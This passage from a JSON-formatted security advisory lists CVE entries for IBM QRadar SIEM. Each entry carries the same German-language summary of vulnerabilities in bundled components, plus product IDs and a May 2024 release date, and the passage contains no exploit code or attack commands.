"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-2166"
},
{
"cve": "CVE-2023-2176",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-2176"
},
{
"cve": "CVE-2023-23455",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-23455"
},
{
"cve": "CVE-2023-2513",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-2513"
},
{
"cve": "CVE-2023-26545",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-26545"
},
{
"cve": "CVE-2023-27043",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-27043"
},
{
"cve": "CVE-2023-28322",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-28322"
},
{
"cve": "CVE-2023-28328",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-28328"
},
{
"cve": "CVE-2023-28772",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-28772"
},
{
"cve": "CVE-2023-30456",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-30456"
},
{
"cve": "CVE-2023-31084",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-31084"
},
{
"cve": "CVE-2023-3138",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-3138"
},
{
"cve": "CVE-2023-3141",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-3141"
},
{
"cve": "CVE-2023-31436",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-31436"
},
{
"cve": "CVE-2023-3161",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-3161"
},
{
"cve": "CVE-2023-3212",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-3212"
},
{
"cve": "CVE-2023-32324",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-32324"
},
{
"cve": "CVE-2023-32360",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-32360"
},
{
"cve": "CVE-2023-3268",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-3268"
},
{
"cve": "CVE-2023-33203",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-33203"
},
{
"cve": "CVE-2023-33951",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-33951"
},
{
"cve": "CVE-2023-33952",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-33952"
},
{
"cve": "CVE-2023-34241",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-34241"
},
{
"cve": "CVE-2023-35823",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-35823"
},
{
"cve": "CVE-2023-35824",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-35824"
},
{
"cve": "CVE-2023-3609",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-3609"
},
{
"cve": "CVE-2023-3611",
"notes": [
{
"category": "description",
